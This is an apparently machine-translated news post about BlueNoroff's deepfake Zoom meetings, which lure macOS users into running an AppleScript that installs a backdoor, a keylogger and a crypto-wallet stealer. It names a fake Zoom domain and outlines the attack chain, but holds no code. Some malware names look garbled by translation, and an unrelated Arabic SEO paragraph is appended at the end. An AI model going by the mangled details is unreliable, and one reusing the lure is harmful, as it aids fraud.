Passionategeekz June 19th news, technology media bleepingcomputer released a blog post yesterday (June 18), reporting that hacker organization BlueNoroff (also known as Sapphire Sleet, TA444) has forged Zoom video conferences of company executives.Induce employees to install customized malware.
The organization targeted cryptocurrency theft, targeting attacks specifically targeting macOS devices, was discovered by Huntress researchers on June 11, 2025.
Passionategeekz quoted a blog post and introduced that BlueNoroff has targeted employees of a technology company through Deepfake technology: Hackers disguised themselves as external professionals and sent false schedule links through Telegram to induce victims to join the seemingly normal Google Meet meeting.
The actual link jumps to a hacker-controlled fake Zoom domain name. During the meeting, fake company executive videos appeared together with “external participants” to enhance deception.
During the meeting, the victim encountered a microphone failure and the fake executive “suggested” to download the “Zoom extension” to fix the problem. This link leads victims to download AppleScript files (zoom_sdk_support.scpt), after execution, the file is masqueraded as a legal Zoom support page, triggers malicious commands, and downloads the secondary payload from the forged Zoom server (httpssupportus05webzoombiz).
Huntress found that the attack has implanted 8 malicious programs, and the core modules include:
-
Telegram 2: Written in Nim language, disguised as Telegram updater, run periodically and serve as a gateway to subsequent attacks. It uses legal developer certificates to evade detection.
-
Root Troy V4: The remote control backdoor developed by Go language, supports remote code execution, sleep state instruction queue and payload download, and is the attack center.
-
InjectWithDyld: The second stage loader decrypts and injects encrypted malicious code through the AES key, uses macOS specific API to implement process injection, and has the anti-forensics function to clear logs.
-
XScreen (keyboardd): Monitoring module, continuously records keyboard input, screen and clipboard content, and transmits it back to the command server in real time.
-
CryptoBot (airmond): a wallet information stealer for cryptocurrencies, supports more than 20 platforms, and data is encrypted and cached and sent out.
Huntress notes that although Mac users generally believe that they are at a low risk of attack, hackers are accelerating the development of targeted threats as the system becomes more popular in enterprises.
Advertising statement: The external redirect links (including, not limited to, hyperlinks, QR codes, passwords, etc.) contained in the article are used to convey more information and save selection time. The results are for reference only. All articles from Passionategeekz include this statement.
Discover more from PassionateGeekz
Subscribe to get the latest posts sent to your email.
تعد زيادة الزيارات للموقع الإلكتروني من أهم الأهداف لأي صاحب موقع يرغب في تحقيق نتائج ملموسة على الإنترنت. من خلال استخدام استراتيجيات تحسين محركات البحث (SEO) مثل اختيار الكلمات المفتاحية المناسبة، وكتابة محتوى غني وجذاب، يمكنك رفع ترتيب موقعك على نتائج البحث وبالتالي جذب عدد أكبر من الزوار. أيضاً، لا يجب إغفال أهمية وسائل التواصل الاجتماعي في جلب الزوار، إذ يمكن للمحتوى القابل للمشاركة أن ينتشر بسرعة ويساهم في رفع عدد الزيارات. استخدام البريد الإلكتروني بشكل احترافي للترويج للمحتوى يزيد من التفاعل مع الجمهور. أيضاً، الإعلانات المدفوعة مثل Google Ads وFacebook Ads تلعب دورًا فعالاً في الوصول للجمهور المستهدف. علاوة على ذلك، الاهتمام بسرعة تحميل الموقع وتحسين تجربة المستخدم يسهم في بقاء الزوار لمدة أطول وزيادة عدد الصفحات المشاهدة. كل هذه العوامل معًا تساهم في رفع عدد الزيارات بشكل طبيعي ومستدام. تذكر أن النجاح لا يتحقق بين ليلة وضحاها، ولكن مع التخطيط الجيد والعمل المستمر، ستحقق نتائج ممتازة. المحتوى الجيد هو مفتاح النجاح في هذا المجال.